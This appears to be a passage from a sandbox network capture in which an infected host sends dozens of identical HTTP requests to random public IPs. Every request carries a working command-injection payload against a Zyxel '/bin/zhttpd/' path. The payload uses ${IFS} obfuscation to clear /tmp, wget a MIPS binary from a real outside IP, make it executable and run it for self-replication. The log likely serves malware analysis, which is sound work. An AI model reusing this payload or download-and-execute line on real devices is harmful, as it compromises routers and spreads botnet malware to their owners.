                                        Jan 14, 2024 16:18:36.258268118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2164192.168.2.1357296136.101.239.121443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.258322954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2165192.168.2.1350430180.73.139.153443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.258343935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2166192.168.2.1359900157.0.103.143443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.258415937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2167192.168.2.134018487.229.222.189443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.258457899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2168192.168.2.13444188.4.252.28443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.258546114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2169192.168.2.135024295.132.138.250443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.258546114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2170192.168.2.1354154217.66.35.4443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.258550882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2171192.168.2.1350004113.29.78.156443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.258588076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2172192.168.2.134445069.163.142.210443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.258632898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2173192.168.2.1350704131.85.131.16443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.258675098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2174192.168.2.135154834.187.64.181443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.258699894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2175192.168.2.1334158175.159.45.189443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.258749962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2176192.168.2.1356336216.100.128.156443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.258799076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2177192.168.2.1350858111.198.75.103443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.258821964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2178192.168.2.1336328115.127.220.243443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.258871078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2179192.168.2.1354544189.99.206.121443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.258933067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2180192.168.2.134391446.59.169.188443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.258951902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2181192.168.2.135732065.251.242.61443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.259004116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2182192.168.2.1343642148.199.39.0443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.274625063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2183192.168.2.1356820182.229.142.222443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.274707079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2184192.168.2.1347518196.184.24.222443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.274785042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2185192.168.2.134737277.75.163.190443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.274831057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2186192.168.2.133872284.61.254.220443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.274894953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2187192.168.2.135572646.139.105.84443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.274950027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2188192.168.2.135493258.187.109.138443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.275043964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2189192.168.2.1357778209.214.252.2443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.275091887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2190192.168.2.134968296.15.120.111443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.275100946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2191192.168.2.1343816104.251.102.252443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.275157928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2192192.168.2.1359810190.52.184.203443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.275226116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2193192.168.2.1358116115.64.108.176443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.275290966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2194192.168.2.1336724138.115.214.225443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.275320053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2195192.168.2.1357226186.222.43.36443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.275372982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2196192.168.2.135642283.37.215.196443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.275434017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2197192.168.2.133353479.254.181.112443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.275471926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2198192.168.2.1338364100.181.185.17443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.275525093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2199192.168.2.133369642.72.249.252443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.275595903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2200192.168.2.1359554186.213.84.147443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.275671959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2201192.168.2.1352294170.177.198.162443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.275757074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2202192.168.2.1359416188.115.219.217443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.275809050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2203192.168.2.135231246.75.185.177443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.275873899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2204192.168.2.1341458155.146.235.143443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.275928974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2205192.168.2.135879634.4.135.61443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.275968075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2206192.168.2.135473613.144.239.19443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.276065111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2207192.168.2.1350212156.254.213.176443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.276139021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2208192.168.2.1350150174.246.84.74443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.276201963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2209192.168.2.134828477.0.127.106443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.276245117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2210192.168.2.136050042.85.43.128443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.276283979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2211192.168.2.1349954137.71.126.197443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.276360035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2212192.168.2.1338784186.191.13.249443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.276403904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2213192.168.2.1355678141.206.70.162443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.276456118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2214192.168.2.1355982149.85.207.17443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.276498079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2215192.168.2.133900480.74.56.4443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.276561022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2216192.168.2.1356792169.118.39.211443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.276632071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2217192.168.2.1340038183.41.2.255443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.276684046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2218192.168.2.1338230187.55.23.14443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.276757956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2219192.168.2.133313078.36.166.243443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.276817083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2220192.168.2.135582217.116.220.12443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.276878119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2221192.168.2.1337380158.9.21.108443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.276999950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2222192.168.2.1344598178.122.37.34443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.277060032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2223192.168.2.134427445.191.67.57443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.277105093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2224192.168.2.135016439.208.15.109443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.277172089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2225192.168.2.133578272.212.155.42443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.277232885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2226192.168.2.1356428160.83.36.139443
                                        TimestampBytes transferredDirectionData
